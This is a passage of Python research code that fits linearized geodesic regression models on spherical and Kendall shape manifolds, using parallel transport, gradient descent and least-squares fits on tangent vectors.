Y_i_tilde = Y_i_at_f_i.ParallelTranslateAtoB( f_i, beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] += ( Y_i_tilde.tVector[ d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
beta_tVec_f_i = manifolds.sphere_tVec( nManifoldDim )
for tt in range( len( cov_intercept_list[ i ] ) ):
est_beta_tt = tVec_intercept_arr[ tt ]
for kk in range( nManifoldDim ):
beta_tVec_f_i.tVector[ kk ] += ( est_beta_tt.tVector[ kk ] * cov_intercep_list[ i ][ tt ] )
f_i = beta0.ExponentialMap( est_beta_tt )
slope_at_f_i = beta0.ParallelTranslateAtoB( beta0, f_i, slope_tVec )
slope_at_p_i = beta0.ParallelTranslateAtoB( f_i, p0_list[ i ], slope_at_f_i )
prev_energy_i = 0
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ d ] - Y_i.tVector[ d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ]
# Calculate Gradient
dE = [ 0, 0, 0 ]
energy_k = 0
# Calculate FDM
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.sphere_tVec( nManifoldDim )
slope_neg_eps = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_neg_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_pos_eps.tVector[ d ] = slope_tVec.tVector[ d ] + eps
slope_neg_eps.tVector[ d ] = slope_tVec.tVector[ d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ dd ] = float( slope_pos_eps_at_p_i.tVector[ dd ] - slope_neg_eps_at_p_i.tVector[ dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ dd ] = slope_parT_p_i.tVector[ dd ] - Y_i.tVector[ dd ]
dE[ d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
print( "dE[ d ] " )
print( dE[ d ] )
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ] - ( stepSize * dE[ d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ d ] - Y_i.tVector[ d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter- 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
# Anchor point is chosen by the last entry of covariates
# Continuous variable such as a genetic disease score should be the last entry of covariates
# If data don't have a continuous covariates, the last entry can be a categorical covariate
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
print( t_list )
p_anchor = beta0
nManifoldDim = p_anchor.nDim
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
Y_j = Y[ j ]
# Parallel translate a group-wise tangent vector to population-level intercept
beta_tVec_f_i = manifolds.sphere_tVec( nManifoldDim )
for tt in range( len( cov_intercept_list[ j ] ) ):
est_beta_tt = tVec_intercept_arr[ tt ]
for kk in range( nManifoldDim ):
beta_tVec_f_i.tVector[ kk ] += ( est_beta_tt.tVector[ kk ] * cov_intercept_list[ j ][ tt ] )
f_j = beta0.ExponentialMap( est_beta_tt )
Y_j_at_f_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], f_j, Y_j )
Y_j_tilde = f_j.ParallelTranslateAtoB( f_j, beta0, Y_j_at_f_j )
tVec_j = Y_j_tilde
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# Intercept point
v_t = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_t.tVector[ d ] = estModel_list[ d ].params[ 0 ]
# print( "Anchor point to intercept" )
# print( v_to_base_on_p_anchor.tVector )
# newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_DirectTransport_Sphere( X, Y, beta0, p0_list, tVec_intercept_arr, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0:
nManifoldDim = beta0.nDim
slope_tVec = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] = 0
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
Y_i_tilde = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] += ( Y_i_tilde.tVector[ d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
slope_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
prev_energy_i = 0
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ d ] - Y_i.tVector[ d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ]
# Calculate Gradient
dE = [ 0, 0, 0 ]
energy_k = 0
# Calculate FDM
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.sphere_tVec( nManifoldDim )
slope_neg_eps = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_neg_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_pos_eps.tVector[ d ] = slope_tVec.tVector[ d ] + eps
slope_neg_eps.tVector[ d ] = slope_tVec.tVector[ d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ dd ] = float( slope_pos_eps_at_p_i.tVector[ dd ] - slope_neg_eps_at_p_i.tVector[ dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.sphere_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ dd ] = slope_parT_p_i.tVector[ dd ] - Y_i.tVector[ dd ]
dE[ d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
print( "dE[ d ] " )
print( dE[ d ] )
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ] - ( stepSize * dE[ d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ d ] - Y_i.tVector[ d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter- 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
# Anchor point is chosen by the last entry of covariates
# Continuous variable such as a genetic disease score should be the last entry of covariates
# If data don't have a continuous covariates, the last entry can be a categorical covariate
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
print( t_list )
p_anchor = beta0
nManifoldDim = p_anchor.nDim
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
# Parallel translate a group-wise tangent vector to population-level intercept
tVec_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], p_anchor, Y[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# Intercept point
v_t = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_t.tVector[ d ] = estModel_list[ d ].params[ 0 ]
# print( "Anchor point to intercept" )
# print( v_to_base_on_p_anchor.tVector )
# newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
def MultivariateLinearizedGeodesicRegression_Sphere_BottomUp( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# The numbers
nGroup = len( t_list )
nData_group = []
for i in range( nGroup ):
nData_group.append( len( t_list[ i ] ) )
nParam_int = len( cov_intercept_list[ 0 ] )
nParam_slope = 0
if not len( cov_slope_list ) == 0:
nParam_slope = len( cov_slope_list[ 0 ] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Group : " + str( nGroup ) )
for i in range( nGroup ):
print( "Group " + str( i + 1 ) + " : " + str( nData_group[ i ] ) + " Obs." )
print( "No. Covariates for Intercept: " + str( nParam_int ) )
print( "No. Covariates for Slope: " + str( nParam_slope ) )
# Group-wise intercept, slope tangent vector, covariates (intercept/slope), time
p0_group_list = [] # 1-D Array N x 1
v_group_list = [] # 1-D Array N x 1
cov_intercept_group_list = [] # 2-D Array N x C_int
cov_slope_group_list = [] # 2-D Array N x C_slope
t_group_list = [] # 2-D Array N x O
for g in range( nGroup ):
t_list_g = t_list[ g ]
pt_list_g = pt_list[ g ]
p0_g, v_g = LinearizedGeodesicRegression_Sphere( t_list_g, pt_list_g )
print( "v_g.tVector" )
print( v_g.tVector )
p0_group_list.append( p0_g )
v_group_list.append( v_g )
cov_intercept_group_list.append( cov_intercept_list[ g ] )
if not len( cov_slope_list ) == 0:
cov_slope_group_list.append( cov_slope_list[ g ] )
##############################################
## Solve Intercepts Points w.r.t Covariates ##
##############################################
beta0, tangent_intercept_arr = MultivariateLinearizedGeodesicRegression_Intercept_Sphere( cov_intercept_group_list, p0_group_list, verbose=verbose )
##############################################
## Solve Tangent Vectors w.r.t Covariates ##
##############################################
print( len ( cov_slope_group_list ) )
print( len ( v_group_list ) )
print( "cov_slope_group_list" )
print( cov_slope_group_list )
print( "v_group_list" )
print( v_group_list[ 0 ].tVector )
print( v_group_list[ 1 ].tVector )
tangent_slope_arr = MultivariateLinearizedGeodesicRegression_Slope_Sphere( cov_slope_group_list, v_group_list, beta0, p0_group_list, tangent_intercept_arr, cov_intercept_group_list, verbose=verbose )
return beta0, tangent_intercept_arr, tangent_slope_arr
def MultivariateLinearizedGeodesicRegression_Slope_Sphere_PoorSasaki( X, Y, beta0, p0_list, tVec_intercept_arr, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0:
nManifoldDim = beta0.nDim
slope_tVec = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] = 0
print( len( Y ) )
L = 1000
beta0_l_1 = beta0
v0_l_1 = manifolds.sphere_tVec( nManifoldDim )
for i in range( len( Y ) ):
Y_i = Y[ i ]
Y_i_l_1 = Y_i.ScalarMultiply( 1.0 / float( L ) )
Y_i_l_1_parT = p0_list[ i ].ParallelTranslateAtoB( p0_list[ i ], beta0_l_1, Y_i_l_1 )
for d in range( nManifoldDim ):
v0_l_1.tVector[ d ] += ( Y_i_l_1_parT.tVector[ d ] / float( len( Y ) ) )
g0_list = [ beta0_l_1 ]
v0_list = [ v0_l_1 ]
t0_list = [ 0 ]
for l in range( L ):
beta0_l = beta0_l_1.ExponentialMap( v0_l_1 )
g0_list.append( beta0_l )
t0_list.append( float( l + 1 ) / float( L ) )
v0_l = manifolds.sphere_tVec( nManifoldDim )
for i in range( len( Y ) ):
Y_i = Y[ i ]
p_i_l = p0_list[ i ].ExponentialMap( Y_i.ScalarMultiply( float( l + 1 ) / float( L ) ) )
Y_i_l = p0_list[ i ].ParallelTranslateAtoB( p0_list[ i ], p_i_l, Y_i.ScalarMultiply( 1.0 / float( L ) ) )
Y_i_l_parT = p_i_l.ParallelTranslateAtoB( p_i_l, beta0, Y_i_l )
for d in range( nManifoldDim ):
v0_l.tVector[ d ] += ( Y_i_l_parT.tVector[ d ] / float( len( Y ) ) )
v0_list.append( v0_l )
beta0_l_1 = beta0_l
v0_l_1 = v0_l
p, v0 = LinearizedGeodesicRegression_Sphere( t0_list, g0_list )
tangent_arr = [ ]
tangent_arr.append( v0 )
return p, tangent_arr
return 0
def MultivariateLinearizedGeodesicRegression_Sphere_BottomUp_PoorSasaki( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# The numbers
nGroup = len( t_list )
nData_group = []
for i in range( nGroup ):
nData_group.append( len( t_list[ i ] ) )
nParam_int = len( cov_intercept_list[ 0 ][ 0 ] )
nParam_slope = 0
if not len( cov_slope_list ) == 0:
nParam_slope = len( cov_slope_list[ 0 ][ 0 ] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Group : " + str( nGroup ) )
for i in range( nGroup ):
print( "Group " + str( i + 1 ) + " : " + str( nData_group[ i ] ) + " Obs." )
print( "No. Covariates for Intercept: " + str( nParam_int ) )
print( "No. Covariates for Slope: " + str( nParam_slope ) )
# Group-wise intercept, slope tangent vector, covariates (intercept/slope), time
p0_group_list = [] # 1-D Array N x 1
v_group_list = [] # 1-D Array N x 1
cov_intercept_group_list = [] # 2-D Array N x C_int
cov_slope_group_list = [] # 2-D Array N x C_slope
t_group_list = [] # 2-D Array N x O
for g in range( nGroup ):
t_list_g = t_list[ g ]
pt_list_g = pt_list[ g ]
p0_g, v_g = LinearizedGeodesicRegression_Sphere( t_list_g, pt_list_g )
print( "v_g.tVector" )
print( v_g.tVector )
p0_group_list.append( p0_g )
v_group_list.append( v_g )
cov_intercept_group_list.append( cov_intercept_list[ g ][ 0 ] )
if not len( cov_slope_list ) == 0:
cov_slope_group_list.append( cov_slope_list[ g ][ 0 ] )
##############################################
## Solve Intercepts Points w.r.t Covariates ##
##############################################
beta0, tangent_intercept_arr = MultivariateLinearizedGeodesicRegression_Intercept_Sphere( cov_intercept_group_list, p0_group_list, verbose=verbose )
##############################################
## Solve Tangent Vectors w.r.t Covariates ##
##############################################
print( len (cov_slope_group_list ) )
print( len (v_group_list ) )
beta0, tangent_slope_arr = MultivariateLinearizedGeodesicRegression_Slope_Sphere_PoorSasaki( cov_slope_group_list, v_group_list, beta0, p0_group_list, tangent_intercept_arr, verbose=verbose )
return beta0, tangent_intercept_arr, tangent_slope_arr
##############################################################
## 2D Scale Kendall Shape space ##
##############################################################
def MultivariateLinearizedGeodesicRegression_ScaleKendall2D_BottomUp( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
pt_shape_list = []
pt_scale_list = []
for i in range( len( pt_list ) ):
pt_shape_list_i = []
pt_scale_list_i = []
for j in range( len( pt_list[ i ] ) ):
pt_scale_list_i.append( pt_list[ i ][ j ].pt[ 0 ] )
pt_shape_list_i.append( pt_list[ i ][ j ].pt[ 1 ] )
pt_scale_list.append( pt_scale_list_i )
pt_shape_list.append( pt_shape_list_i )
beta0_scale, tangent_scale_intercept_arr, tangent_scale_slope_arr = MultivariateLinearizedGeodesicRegression_Euclidean_BottomUp( t_list, pt_scale_list, cov_intercept_list, cov_slope_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
beta0_kShape, tangent_kShape_intercept_arr, tangent_kShape_slope_arr = MultivariateLinearizedGeodesicRegression_Kendall2D_BottomUp( t_list, pt_shape_list, cov_intercept_list, cov_slope_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
beta0 = manifolds.scale_kendall2D( beta0_kShape.nPt )
beta0.SetPoint( [ beta0_scale, beta0_kShape ] )
tangent_intercept_arr = []
tangent_slope_arr = []
for i in range( len( tangent_kShape_intercept_arr ) ):
tangent_i = manifolds.scale_kendall2D_tVec( tangent_kShape_intercept_arr[ i ].nPt )
tangent_i.SetTangentVector( [ tangent_scale_intercept_arr[ i ], tangent_kShape_intercept_arr[ i ] ] )
tangent_intercept_arr.append( tangent_i )
for i in range( len( tangent_kShape_slope_arr ) ):
tangent_i = manifolds.scale_kendall2D_tVec( tangent_kShape_slope_arr[ i ].nPt )
tangent_i.SetTangentVector( [ tangent_scale_slope_arr[ i ], tangent_kShape_slope_arr[ i ] ] )
tangent_slope_arr.append( tangent_i )
return beta0, tangent_intercept_arr, tangent_slope_arr
##############################################################
## 2D Kendall Shape space ##
##############################################################
def MultivariateLinearizedGeodesicRegression_Kendall2D_BottomUp( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# The numbers
nGroup = len( t_list )
nData_group = []
for i in range( nGroup ):
nData_group.append( len( t_list[ i ] ) )
nParam_int = len( cov_intercept_list[ 0 ] )
nParam_slope = 0
if not len( cov_slope_list ) == 0:
nParam_slope = len( cov_slope_list[ 0 ] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Group : " + str( nGroup ) )
for i in range( nGroup ):
print( "Group " + str( i + 1 ) + " : " + str( nData_group[ i ] ) + " Obs." )
print( "No. Covariates for Intercept: " + str( nParam_int ) )
print( "No. Covariates for Slope: " + str( nParam_slope ) )
# Group-wise intercept, slope tangent vector, covariates (intercept/slope), time
p0_group_list = [] # 1-D Array N x 1
v_group_list = [] # 1-D Array N x 1
cov_intercept_group_list = [] # 2-D Array N x C_int
cov_slope_group_list = [] # 2-D Array N x C_slope
t_group_list = [] # 2-D Array N x O
for g in range( nGroup ):
t_list_g = t_list[ g ]
pt_list_g = pt_list[ g ]
p0_g, v_g = LinearizedGeodesicRegression( t_list_g, pt_list_g )
p0_group_list.append( p0_g )
v_group_list.append( v_g )
cov_intercept_group_list.append( cov_intercept_list[ g ] )
if not len( cov_slope_list ) == 0:
cov_slope_group_list.append( cov_slope_list[ g ] )
# # Check R2
# mean_g = FrechetMean( pt_list[ g ] )
# sqDist_SG_sum = 0
# sqVar_sum = 0
# for i in range( len( pt_list[ g ] ) ):
# p_i = pt_list_g[ i ]
# t_i = t_list_g[ i ]
# slope_t_i = v_g.ScalarMultiply( t_i )
# est_p_i = p0_g.ExponentialMap( slope_t_i )
# tVec_est_p_i_to_p_i = est_p_i.LogMap( p_i )
# sqDist_i = tVec_est_p_i_to_p_i.normSquared()
# sqDist_SG_sum += sqDist_i
# tVec_mean_to_p_n = mean_g.LogMap( p_i )
# sqVar_n = tVec_mean_to_p_n.normSquared()
# sqVar_sum += sqVar_n
# R2_SG = 1 - ( sqDist_SG_sum / sqVar_sum )
# print( "Subject : " + str( g ) )
# print( str( nData_group[ g ] ) + " Obs." )
# print( R2_SG )
##############################################
## Solve Intercepts Points w.r.t Covariates ##
##############################################
beta0, tangent_intercept_arr = MultivariateLinearizedGeodesicRegression_Intercept_Kendall2D( cov_intercept_group_list, p0_group_list, verbose=verbose )
##############################################
## Solve Tangent Vectors w.r.t Covariates ##
##############################################
tangent_slope_arr = MultivariateLinearizedGeodesicRegression_Slope_Kendall2D( cov_slope_group_list, v_group_list, beta0, p0_group_list, tangent_intercept_arr, cov_intercept_group_list, verbose=verbose )
return beta0, tangent_intercept_arr, tangent_slope_arr
def MultivariateLinearizedGeodesicRegression_Intercept_Kendall2D( X, Y, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
if nParam == 0:
base = FrechetMean( Y )
tangent_arr = []
return base, tangent_arr
# Anchor point is chosen by the last entry of covariates
# Continuous variable such as a genetic disease score should be the last entry of covariates
# If data don't have a continuous covariates, the last entry can be a categorical covariate
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Set an anchor point
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nPt
# Initial intercept point
init_Interp = manifolds.kendall2D( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.kendall2D_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list[ k * nManifoldDim + d].append( tVec_j.tVector[k, d] )
estModel_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ k * nManifoldDim + d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.kendall2D_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ 0, d ] = estModel_list[ d ].params[ 0 ]
v_to_base_on_p_anchor.tVector[ 1, d ] = estModel_list[ nManifoldDim + d ].params[ 0 ]
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ k, d ] = estModel_list[ k * nManifoldDim + d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
